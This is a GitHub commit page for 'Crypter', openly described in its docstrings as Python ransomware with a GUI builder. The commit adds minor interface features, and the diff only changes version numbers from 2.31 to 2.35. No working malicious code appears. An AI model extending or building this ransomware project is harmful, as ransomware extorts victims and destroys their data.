Skip to content

Commit

Permalink
CRYPTER 2.35
Browse files Browse the repository at this point in the history
- Added button to open the containing folder where the Crypter binary
was produced
- Added label to show the configuration file, if any, that is currently
being worked from
- Added some button tooltips
  • Loading branch information
Sithis committed Dec 7, 2017
1 parent 3283881 commit aa7c0ff
Show file tree
Hide file tree
Showing 3 changed files with 4 additions and 4 deletions.
2 changes: 1 addition & 1 deletion Crypter/Main.py
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
'''
@summary: Crypter: Ransomware written entirely in python.
@author: MLS
@version: 2.31
@version: 2.35
'''

# Import libs
Expand Down
2 changes: 1 addition & 1 deletion build/ExeBuilder/Base.py
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@

## VERSION
MAJ_VERSION = "2"
MIN_VERSION = "31"
MIN_VERSION = "35"

# TITLE
TITLE = "Crypter Builder v%s.%s" % (MAJ_VERSION, MIN_VERSION)
Expand Down
4 changes: 2 additions & 2 deletions build/ExeBuilder/__init__.py
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
'''
@summary: Crypter ExeBuilder(Package): ExeBuilder with GUI for building Crypter ransomware
@author: MLS
@version: 2.31
@version: 2.35
'''

# ABOUT
__author__ = "MLS"
__version__ = "2.31"
__version__ = "2.35"
__summary__ = "Provides a GUI for building the Crypter ransomware"

# Import package modules
Expand Down

0 comments on commit aa7c0ff

Please sign in to comment.